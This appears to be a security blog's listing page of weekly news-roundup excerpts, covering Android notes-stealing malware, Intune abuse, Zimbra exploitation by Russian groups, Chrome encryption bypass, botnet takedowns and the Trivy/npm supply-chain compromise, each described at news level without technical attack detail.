Perseus Android Malware Targets Your Notes App While CISA Sounds Alarms on Multiple Exploited Vulnerabilities

You know that feeling when you realize attackers have found a new angle you hadn’t considered? That’s exactly what happened this week with the discovery of Perseus, a new Android malware that’s doing something I haven’t seen before – it’s specifically targeting users’ note-taking apps to steal sensitive information.

While we’ve all gotten pretty good at warning people not to store passwords in plain text files, how many of us have explicitly told users not to jot down crypto wallet recovery phrases or banking details in their phone’s notes app? The Perseus malware is betting that not many of us have had that conversation, and honestly, they’re probably right.

Microsoft Intune Under Fire: Why CISA’s Latest Warning Should Be Your Wake-Up Call

If you’ve been putting off that Intune security review, this week’s events might be the push you need. CISA just issued a stark warning to U.S. organizations about securing their Microsoft Intune deployments after cybercriminals used the endpoint management platform to completely wipe systems at medical technology giant Stryker.

This isn’t just another “patch your systems” advisory. When attackers can turn your own management tools against you, we’re looking at a fundamental shift in how we need to think about endpoint security.

Russian APTs Target Ukrainian Infrastructure While Critical Flaws Hit Enterprise Networks

It’s been one of those weeks where the threat landscape feels particularly active, and I wanted to walk through some developments that caught my attention. We’re seeing a concerning mix of nation-state activity and critical enterprise vulnerabilities that deserve our immediate focus.

Russian Groups Double Down on Zimbra Attacks

The most troubling news comes from Ukraine, where Russian APT groups are actively exploiting a Zimbra vulnerability to target critical infrastructure. According to SecurityWeek, this isn’t your typical phishing campaign - they’re leveraging insufficient CSS sanitization in HTML emails to execute inline scripts when messages are opened in browsers.

Password Resets Are the New Front Door for Attackers

I was reviewing some recent security incidents this week, and something caught my attention that I think we all need to talk about. While we’ve been busy hardening our primary authentication systems with MFA, zero trust, and all the latest security controls, attackers have quietly shifted their focus to a much softer target: password reset workflows.

It’s one of those “why didn’t I think of that” moments. We spend months implementing robust login security, then leave the back door wide open with poorly designed password reset processes. And the bad news? This trend is accelerating alongside some pretty serious developments in mobile security and AI-related incidents.

Chrome’s Encryption Cracked by New Malware While Quantum-Safe Web Gets Closer

We’ve got some interesting developments this week that really highlight how the security game keeps evolving. A new piece of malware called VoidStealer just figured out how to crack Chrome’s supposedly bulletproof Application-Bound Encryption, while on the flip side, we’re seeing real progress toward a quantum-safe web that could actually make things faster, not slower.

VoidStealer Breaks Chrome’s Master Key Protection

Here’s something that should grab your attention: VoidStealer malware has found a clever way around Chrome’s Application-Bound Encryption (ABE) using what they’re calling a “debugger trick.”

Major Botnet Takedown Shows Why IoT Security Can’t Wait

This week brought some encouraging news that we don’t see nearly often enough: a successful international takedown of major botnet infrastructure. But as I dug into the details alongside other security developments, it became clear we’re dealing with the same fundamental problems that keep security teams up at night.

The Big Win: Four Botnets Down

The headline story comes from a joint operation between US, German, and Canadian authorities who successfully disrupted the command and control infrastructure powering four massive botnets: Aisuru, KimWolf, JackSkid, and Mossad. These weren’t small-time operations – they were described as among the world’s largest DDoS botnets, primarily targeting IoT devices.

When AI Meets Crime: $10M Streaming Fraud and the Week’s Biggest Security Disruptions

You know that feeling when you realize criminals are getting more creative with technology than some of our legitimate use cases? This week delivered a perfect example with a North Carolina musician who just pleaded guilty to stealing over $10 million through an AI-powered streaming fraud scheme that’s honestly kind of brilliant – and terrifying.

Michael Smith figured out how to game Spotify, Apple Music, Amazon Music, and YouTube Music using AI bots to generate fake streams of his music. We’re talking about a sophisticated operation that flew under the radar long enough to net him eight figures. It’s a reminder that fraud detection systems, no matter how advanced, still struggle with well-orchestrated attacks that mimic legitimate user behavior at scale.

Supply Chain Attacks Are Getting Nastier: CanisterWorm Shows How Fast Things Can Spiral

I’ve been watching the security news this week, and honestly, it’s been a bit of a wake-up call. We’re seeing attackers get more creative and more persistent, especially when it comes to supply chain attacks. The most concerning story has to be the CanisterWorm incident that’s been spreading across npm packages like wildfire.

When One Attack Becomes Many

Here’s what happened: threat actors initially targeted Trivy, that popular container security scanner we’ve all probably used at some point. But instead of stopping there, they’ve managed to compromise 47 npm packages with something called CanisterWorm. The name comes from its use of ICP canisters - basically tamperproof smart contracts that make this thing incredibly persistent.

Oracle’s Critical RCE Vulnerability and Android’s New Security Features Dominate This Week’s Security News

It’s been one of those weeks where the security community has been juggling multiple urgent issues – from a critical Oracle vulnerability that’s basically a hacker’s dream to some surprisingly positive developments in Android security. Let me walk you through what’s been keeping our incident response teams busy.

Oracle Drops a CVSS 9.8 Bomb

The biggest story this week is Oracle’s emergency patch for CVE-2026-21992, affecting their Identity Manager and Web Services Manager. When Oracle says a vulnerability is “remotely exploitable without authentication” and slaps a 9.8 CVSS score on it, you know someone’s day is about to get very complicated.

When Your Security Tools Become the Attack Vector: The Trivy Supply Chain Compromise and This Week’s Security Reality Check

You know that sinking feeling when you realize the very tools you rely on to protect your infrastructure might be compromised? That’s exactly what happened this week with the Trivy vulnerability scanner breach, and it’s a stark reminder of how sophisticated supply chain attacks have become.

The Trivy Compromise: A Masterclass in Supply Chain Attacks

The Trivy vulnerability scanner breach is particularly unsettling because of how cleanly it was executed. TeamPCP, the threat actors behind this attack, didn’t just compromise some random repository – they went after one of our go-to security tools and managed to push credential-stealing malware through official releases and GitHub Actions.